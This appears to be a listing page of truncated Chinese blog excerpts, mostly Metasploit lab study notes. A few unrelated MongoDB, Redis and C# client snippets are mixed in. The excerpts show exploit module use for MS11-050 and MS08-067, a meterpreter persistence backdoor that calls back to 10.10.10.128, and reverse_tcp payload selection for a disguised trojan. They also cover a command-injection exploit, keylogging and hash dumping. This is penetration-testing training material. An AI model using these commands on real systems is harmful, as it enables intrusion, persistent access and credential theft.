1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > info Name: MS11-050 IE mshtml!CObjectElement Use After Free Module: exploit/windows/browser/ms11_…
1.内存攻防技术 1.1缓冲区溢出漏洞机理 1.2栈溢出利用机理 1.3缓冲区溢出利用的限制条件 2.网络服务渗透攻击面 3. Windows服务渗透攻击实战案例——MS08-067安全漏洞 示例代码如下 msf > search ms08_067     在metasploit框架中查找ms08_06 netapi攻击模块 Matching Modules ================ Name                                 Disclosure Date…
1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. 1.2文件系统命令 1.3网络命令 1.4系统命令 2.后渗透攻击模块 2.1persistence后渗透攻击模块 示例代码如下 meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128 [!] Meterpreter scripts…
不多说,直接上干货! 连接后台的数据库,当然不是必须品. 连接数据库的好处:1.可以攻击和扫描的结果,保存起来      2.将一些搜索结果做个缓存 默认数据库是postgresql. 同时要注意的是:在kali linux系统中,不需再安装postgresql和mestasploit. 如果你用的是其他系统的话,有可能还需要下载安装. 查看 postgresql 是否启动,没有启动的话,使用 service postgresql start 命令启动.启动后查看是否启动成功,端口是 5432…
1.社会工程学攻击案例——伪装木马 Linux命令终端输入命令msfvenom -l payloads用来列出攻击载荷,grep命令用来查询所需要的攻击载荷,条件是windows系统.要有回连至监听主机的能力.支持后渗透攻击功能,示例代码如下 root@kali:~# msfvenom -l payloads|grep 'windows'|grep 'reverse_tcp'|grep 'meterpreter' windows/meterpreter/reverse_tcp          …
1.更新 apt-get update:更新源 apt-get upgrade:更新软件包 apt-get dist-upgrade:升级系统 2. Metasploit基础 2.1专业名词 Auxiliaries(辅助模块) 扫描,嗅探,指纹识别 Exploit(漏洞利用模块) 针对漏洞进行攻击 Payload:目标被渗透之后的完成实际攻击功能的代码如添加一个用户,关机等等 Post(后期渗透模块): 后渗透的一些攻击:获取敏感信息,实现天半攻击等 Encoders:免杀,混淆 2.2 渗透步…
1.命令注入实例分析 对定V公司网站博客系统扫描可以发现,它们安装了zingiri-web-shop这个含有命令注入漏洞的插件,到www.exploit-db.com搜索,可以看到2011.11.13网站公布了php渗透代码. 把这个代码放到kali中,执行命令php 18111.php 10.10.10.129 /wordpress/成功得到目标主机Shell,并能执行相关命令 2.文件包含和文件上传漏洞 查看定V公司博客源代码可以发现后台使用了插件——1 Flash Gallery Word…
书364页配置假冒AP步骤,因为没有无线网卡,先跳过这个实验.…
1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):root@kali:~# whois testfire.net  s (2)nslookup与dig域名查询(查询域名相应的IP地址):msf > nslookup > set type=A > testfire.net msf > dig 注:nslookup仅仅能得到DNS解析server保存在Cache中的非权威解答,dig则能够从该域名…
原创博客,转载请注出处! 各位看官可参看——Metasploit实验操作 1.打开msf        msfconsole2.帮助选项:    msfconsole -h        显示在msfconsole初始化的选项和参数    在进入msfconsole后键入help    显示的是进入msfconsole后可用的选项3.参数:  back    用于返回.例如进入了一个漏洞模块后但是想重新选择另一个漏洞模块此时可以使用back参数    eg.开始进入ms08_067_netapi…
<Metasploit渗透测试魔鬼训练营>书56页开始配置网络环境,一共五台机器,攻击机换成了自己更常用的kali,配置方法和back track相同. kali(攻击机) 10.10.10.128 attacker.dvssc.com root/root OWASP BWA(模拟定V安全公司DMZ区中的门户网站服务器) 10.10.10.129 www.dvssc.com root/owaspbwa Win2k3(模拟定V安全公司DMZ区中的后台服务器) 10.10.10.130 servi…
回到目录 当我们从MongoDB网站下载安装包之后,它会伴随有一系列的工具,服务器程序mongod是我们耳熟能详的了,客户端mongo和性能检测mongostat我们可能就没有用过了,今天主要是介绍一下mongo这个客户端命令行工具的使用. 测试环境:服务端:linux版的mongod 2.6.9 客户端:window版的mongo 2.6.9 下面介绍一些常用的命令 1 建立一个新的链接 var x=new Mongo("192.168.2.4:27017") 2 显示所有数据库 s…
Redis服务器是典型的一对多服务器程序:一个服务器可以与多个客户端建立网络连接,每个客户端可以向服务器发送命令请求,而服务器则接收并处理客户端发送的命令请求,并向客户端返回命令回复. 对于每个与服务器进行连接的客户端,服务器都为这些客户端建立了相应的redis.h/redisClient结构(客户端状态),这个结构保存了客户端当前的状态信息,以及执行相关功能时需要用到的数据结构,其中包括: 客户端的套接字描述符; 客户端的名字; 客户端的标志值(flag); 指向客户端正在使用的数据库的指针,…
使用漏洞扫描器会在网络上产生大量流量,因此如果你不希望被发现踪迹时,不要使用漏洞扫描器。 The Basic Vulnerability Scan 漏洞扫描器的质量很大程度上取决于它自带的漏洞特征库。 实用的漏洞扫描器:NeXpose、Nessus和一些专门的扫描器。 (1)NeXpose 可以使用独立版本的nexpose,也可以使用metasploit内置的nexpose。 (2)Nessus (3)专用扫描器: 验证SMB登录: msf > use auxiliary/scanner/smb…
客户端: 定义 private AsyncTcpSession client; 初始化 client = new AsyncTcpSession(); client.Connected += ClientOnConnected; client.Closed += ClientOnClosed; client.DataReceived += ClientOnDataReceived; ThreadPool.QueueUserWorkItem(ConnectServer_Loop); 事件 priv…
一.Samba介绍 Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成.SMB是一种在局域网上实现共享文件和打印机的协议.存在一个服务器,客户机通过该协议可以服务器上的共享文件系统和打印机以及其他的资源.通过设置,还可以和全世界的电脑分享资源 二.Username map script 是什么  Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行   影响Samba的3.0.20到3.0.25rc3 版本   当使用非默认的用户名映射…
1.外围信息搜集 1.1whois域名注册信息查询 示例代码如下 msf > whois testfire.net 1.2网站的目录结构 示例代码如下 msf > use auxiliary/scanner/http/dir_scanner msf auxiliary(scanner/http/dir_scanner) > set THEREADS 50 THEREADS => 50 msf auxiliary(scanner/http/dir_scanner) > set…
四.客户端攻击      客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击.      4.1客户端渗透攻击的安全防护机制              ①DEP                 DEP(数据执行保护)基本原理是操作系统通过设置内存页的属性,指明数据所在的内存页为不可执行.              ②ASLR                …
继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)         Sql注入攻击:大致分为 普通注入和盲注         跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS         跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求.         会话认证管理缺陷:…
Metasploit学习笔记(博主推荐) 继续上面的博客 metasploit.meterpreter的基本使用: 首先来获取当前系统(即xp)下的正在运行的一些进程 获得进程之后,我们通过migrate来注入到其中的一个进程里面去. 那么使用哪一个进程呢?最好去选择就是桌面程序. 即,目标主机XP系统那边,的键盘记录,都将会存在这个文件里. 好的,去XP系统那边,随便输入啥吧 501代表权限,不是真实的哈希值. 有了这个哈希值的用途 (1): 可以找一些在线的破解网端.可以直接破解出来 (2)…
前面依次介绍了Armitage.MSFCONSOLE和MSFCLI接口的概念及使用.本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务.PostgreSQL数据库服务.Tomcat服务和PDF文件等. 6.4.1 渗透攻击MySQL数据库服务 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,目前属于Oracle公司.在Metasploitable系统中,MySQL的身份认证存在漏洞.该漏洞有可能会让潜在的攻击者不必提供正确的身份证书便可访问MySQL数据库.…
回到占占推荐博客索引 该来的总会来的,Ef,Redis,MVC甚至Sqlserver都有了自己的系列,MongoDB没有理由不去整理一下,这个系列都是平时在项目开发时总结出来的,希望可以为各位一些帮助和启发,文章中有对新技术的研究(Mongo驱动),对老技术的回顾(代码重构),还有对架构设计的阐述等(面向接口编程,对扩展开放,对修改关闭,所以出现了IMongoRepository接口). MongoDB学习笔记系列~目录 MongoDB学习笔记~环境搭建 (2015-03-30 10:34) M…
MongoDB学习笔记~环境搭建 (2015-03-30 10:34) MongoDB学习笔记~MongoDBRepository仓储的实现 (2015-04-08 12:00) MongoDB学习笔记~ObjectId主键的设计 (2015-04-09 13:08) MongoDB学习笔记~客户端命令行的使用 (2015-04-10 13:40) MongoDB学习笔记~索引提高查询效率 (2015-04-10 15:35) MongoDB学习笔记~为IMongoRepository接口添加分…
三.网络服务渗透攻击 3.1 内存攻防技术      3.1.1 缓冲区溢出漏洞机理              缓冲区溢出是程序由于缺乏对缓冲区的边界条件检查而引起的一种异常行为.              一般根据缓冲区溢出的内存位置不同,将缓冲区溢出分为栈溢出和堆溢出.      3.1.2 栈溢出利用原理             栈溢出发生在向栈中写数据时,当数据长度超过栈分配的空间时,就会造成溢出.             ①覆盖函数返回地址利用方式                程序一…
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器.下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~ 一.情报搜集     1.外围信息搜集       外围信息搜集又叫公开渠道信息搜集.搜索引擎,公共信息库,目标门户网站等等都是很好的入手点.metasploit有一类“辅助模块”,可以帮助你进行信息搜集的工作,并且还集成了nmap等神器.       1.1通过DNS和IP挖掘目标网站的信息            ①who…
七.强大的meterpreter  7.1再探metasploit的攻击载荷模块     7.1.1典型的攻击载荷模块     metasploit涵盖了各大主流操作系统和平台,其中绝大部分是远程漏洞利用所使用的攻击载荷模块,功能一般是开启远程shell,远程执行命令.     metasploit支持用户将自己的shellcode导入框架中,只需将payload替换成自己的shellcode代码,修改一下描述等基础信息即可.     7.1.2使用攻击载荷模块     search 搜索,查询…
Web安全攻防 渗透测试实战指南   学习笔记 (三) burp suite详解                                                 是一款集成化渗透测试工具(java编写,因此运行时依赖JRE,需要安装Java环境才可以运行)   安装JDK过程网上教程很多,可以根据自己需要的版本和操作系统来安装. 若在cmd中输入java -version  回车后返回版本信息则说明已经正确安装. 配置环境变量(参考网上教程) 若在cmd中输入javac  回车后…
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁. 如图1,kali的IP为:192.168.19.128 如图2:靶机的IP:…
Web安全攻防 渗透测试实战指南   学习笔记 (五)   第四章 Web安全原理解析  (一) (一)SQL注入的原理 1.web应用程序对用户输入数据的合法性没有判断. 2.参数用户可控:前端传给后端的参数内容是用户可以控制的. 3.参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询. 举个栗子:   and = 当1=1为真,且where语句中id也为真,页面会返回与id=1相同的结果. 当传入的id参数为and 1=2时,由于1=2为假,所以页面就会返回与id=1不同的结果…
Web安全攻防 渗透测试实战指南   学习笔记 (四) Nmap                                       Network  Mapper    是一款开放源代码的网络探测和安全审核工具   nmap的相关参数和常用方法在此篇文章中已经注明~   https://www.cnblogs.com/0yst3r-2046/p/11012855.html     下面来介绍nmap的进阶用法~   1>脚本介绍   nmap的脚本默认存在 /xx/nmap/scrip…